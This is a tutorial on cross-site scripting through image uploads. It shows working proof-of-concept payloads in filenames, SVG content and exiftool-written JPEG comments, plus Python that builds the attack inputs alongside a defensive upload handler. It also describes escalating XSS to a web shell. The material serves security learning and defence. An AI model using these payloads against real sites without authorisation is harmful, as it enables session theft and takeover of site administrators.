xss payload

File upload functionality is sometimes vulnerable to XSS when the application does not sanitize what it receives. Authenticated areas with an uploaded image or profile picture are everywhere, which gives plenty of chances to find a developer's mistake. In a web application there are three entry points for this attack:

1. Filename

The filename itself may be reflected in the page, so it is just a matter of naming the file with an XSS payload. Sometimes it does not fire because the developer has added filters (on image size, for instance) that have to be bypassed first. Below is an example of file upload XSS.

In the example above the page reflects the name with a classic payload and no filters in the way, so the attacker can simply name the file:

"><img src=x onerror=prompt(document.domain)>.jpg

The disadvantage is that this only works from a Linux based OS: Windows does not allow the characters < > " in a filename, so a file with that name cannot be created there. What the server sees, however, is the filename field of the multipart request, so it can also be edited in an intercepting proxy regardless of the client OS.

2. Content

If the application does not allow the SVG extension (an image type), bypass the check with the Burp Suite proxy; the following file content (payload) then triggers the cross site scripting when the SVG is opened in the browser:

<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>

3. Metadata

Using ExifTool it is possible to set metadata fields that the server may reflect somewhere. If you do not have ExifTool, install it with the following command in the terminal:


sudo apt install libimage-exiftool-perl

An example, writing the payload into the image's comment tag (any tag the application later displays works the same way):

$ exiftool -Comment='"><img src=1 onerror=alert(document.domain)>' wal.jpg
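The three entry points above, as an added example that is not code from the original page: the page's filename and SVG payloads, a constructed JPEG whose COM metadata segment carries the page's exiftool payload (the segment that `-Comment=` writes), a multipart body that sets the filename regardless of the client OS, and a constructed server-side handler that neutralises each vector. The handler, the multipart builder and every function name are assumptions made for this illustration.

```python
"""
Added example, not from the original page: the three upload XSS entry points
(filename, content, metadata) built on the attacker side, and a constructed
server-side handler that neutralises each one. Payload strings are the page's;
the JPEG bytes, multipart builder, handler and function names are assumptions.
"""
import html
import secrets
import struct

# --- attacker side --------------------------------------------------------

# 1. Filename payload from the page (cannot exist as a file on Windows, but
#    the name inside the multipart request is free text on any OS).
FILENAME_PAYLOAD = '"><img src=x onerror=prompt(document.domain)>.jpg'

# 2. SVG content payload (real SVG namespace, so browsers run onload).
SVG_PAYLOAD = (b'<svg xmlns="http://www.w3.org/2000/svg" '
               b'onload="alert(document.domain)"/>')

# 3. Metadata payload from the page's exiftool example.
META_PAYLOAD = b'"><img src=1 onerror=alert(document.domain)>'


def jpeg_with_comment(comment: bytes) -> bytes:
    """Constructed minimal JPEG: SOI, one COM (0xFFFE) segment holding the
    payload (what `exiftool -Comment=...` writes), then EOI. Not a decodable
    picture, only enough to drive a metadata parser."""
    seg = b"\xff\xfe" + struct.pack(">H", len(comment) + 2) + comment
    return b"\xff\xd8" + seg + b"\xff\xd9"


def multipart_body(filename: str, data: bytes, boundary: str = "XSSBOUNDARY") -> bytes:
    """Raw multipart/form-data body as sent to the server; the filename is set
    here, which is what an intercepting proxy lets you edit."""
    head = (f"--{boundary}\r\nContent-Disposition: form-data; name=\"file\"; "
            f"filename=\"{filename}\"\r\nContent-Type: image/jpeg\r\n\r\n")
    return head.encode() + data + f"\r\n--{boundary}--\r\n".encode()


# --- server side ----------------------------------------------------------

ALLOWED_MAGIC = {
    b"\xff\xd8\xff": ("image/jpeg", ".jpg"),
    b"\x89PNG\r\n\x1a\n": ("image/png", ".png"),
    b"GIF87a": ("image/gif", ".gif"),
    b"GIF89a": ("image/gif", ".gif"),
}


def sniff(data: bytes):
    """Identify the type from content, never from extension or client MIME."""
    for magic, info in ALLOWED_MAGIC.items():
        if data.startswith(magic):
            return info
    return None


def jpeg_comments(data: bytes) -> list:
    """Walk JPEG marker segments and collect COM (0xFFFE) payloads, stopping
    at SOS (0xFFDA) where entropy-coded data without a length field begins."""
    out, i = [], 2  # skip SOI
    while i + 4 <= len(data) and data[i] == 0xFF:
        marker = data[i + 1]
        if marker in (0xD9, 0xDA):                      # EOI or SOS: stop
            break
        if marker == 0x01 or 0xD0 <= marker <= 0xD7:    # standalone markers
            i += 2
            continue
        length = struct.unpack(">H", data[i + 2:i + 4])[0]
        if marker == 0xFE:
            out.append(data[i + 4:i + 2 + length])
        i += 2 + length
    return out


def handle_upload(client_filename: str, data: bytes) -> dict:
    """Store the file safely and return only HTML-safe values for rendering.
    Raises ValueError when the content is not an allowed image."""
    info = sniff(data)
    if info is None:
        raise ValueError("rejected: content is not an allowed image type")
    mime, ext = info
    # 1. Filename: never reuse the client's name on disk or unescaped in HTML.
    stored_name = secrets.token_hex(16) + ext
    display_name = html.escape(client_filename, quote=True)
    # 3. Metadata: everything read out of the file is untrusted; escape it.
    comments = []
    if mime == "image/jpeg":
        comments = [html.escape(c.decode("utf-8", "replace"), quote=True)
                    for c in jpeg_comments(data)]
    # 2. Content: fixed type, nosniff and attachment, so nothing is rendered
    #    as an HTML/SVG document even if the sniff above were wrong.
    headers = {
        "Content-Type": mime,
        "X-Content-Type-Options": "nosniff",
        "Content-Disposition": f'attachment; filename="{stored_name}"',
    }
    return {"stored_name": stored_name, "display_name": display_name,
            "comments": comments, "headers": headers}


if __name__ == "__main__":
    print(multipart_body(FILENAME_PAYLOAD, jpeg_with_comment(META_PAYLOAD))[:120])
    print(handle_upload(FILENAME_PAYLOAD, jpeg_with_comment(META_PAYLOAD)))
    print("svg accepted:", sniff(SVG_PAYLOAD) is not None)
```

The handler makes the three page vectors inert in the same place they arrive: the client filename never reaches disk or the page unescaped, the SVG body is refused because type is decided from magic bytes rather than extension, and the COM comment is escaped before it can be reflected; the response headers are the backstop if a check is bypassed.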

Other file types have their own signature made of ASCII characters, which can itself be used to carry a payload. There are more elaborate examples of XSS using an image file, usually bypassing server side size, name and GD library filters. Leveraging a cross site scripting vulnerability to RCE is usually done by compromising the admin account of the targeted website: admins tend to have upload functionality on their dashboard, so the XSS can make the admin upload a web shell to the targeted website and achieve RCE.
